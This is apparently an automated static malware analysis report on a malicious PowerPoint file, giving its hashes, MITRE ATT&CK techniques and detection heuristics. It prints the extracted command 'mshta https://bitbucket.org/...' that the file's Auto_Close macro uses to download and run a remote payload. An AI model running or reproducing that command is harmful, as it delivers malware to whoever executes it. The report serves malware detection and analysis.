Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 047d80cb755459b1…

MALICIOUS

Office (OLE) / .PPT

62.0 KB Created: 2022-07-06 21:24:46 Authoring application: Microsoft Office PowerPoint
MD5: dcc68e3f0c6e78d291abc90ae5ca94f5 SHA-1: 3081a4c093328f07f0c00bd0839c24f083b4e936 SHA-256: 047d80cb755459b156e82321ecb1ae99e63169a38a313215e9b9a42f30ae6490
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.005 Client Execution: Mshta T1566.001 Spearphishing Attachment

The sample contains VBA macros that leverage the Auto_Close function to execute mshta.exe. This executable is then used to download and run a payload from the reconstructed URL: "mshta https://bitbucket.org/!api/2.0/snippets/rikimartinplace/oq7nj8/62f3fdb4c415b179d375bfb22b2bda233968102b/files/dollar1final". This indicates a likely initial access vector via spearphishing attachment, leading to the execution of a secondary stage. The use of mshta.exe is a common technique for bypassing application whitelisting and executing malicious code.

Heuristics 9

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
  • Reference to mshta.exe high SC_STR_MSHTA
    Reference to mshta.exe
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://bitbucket.org/!api/2.0/snippets/rikimartinplace/oq7nj8/62f3fdb4c415b179d375bfb22b2bda233968102b/files/dollar1final�
    • https://bitbucket.org/!api/2.0/snippets/rikimartinplace/oq7nj8/62f3fdb4c415b179d375bfb22b2bda233968102b/files/dollar1final$
    • https://bitbucket.org/!api/2.0/snippets/rikimartinplac
    • https://bitbucket.org/!api/2.0/snippets/rikimartinplace/oq7nj8/62f3fdb4c415b179d375bfb22b2bda233968102b/files/dollar1final

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
bcb7b3e1d12e1c13807945dc350e8ac3571f4675a1dfe60d1a798e02a35dc42a		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 1491 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.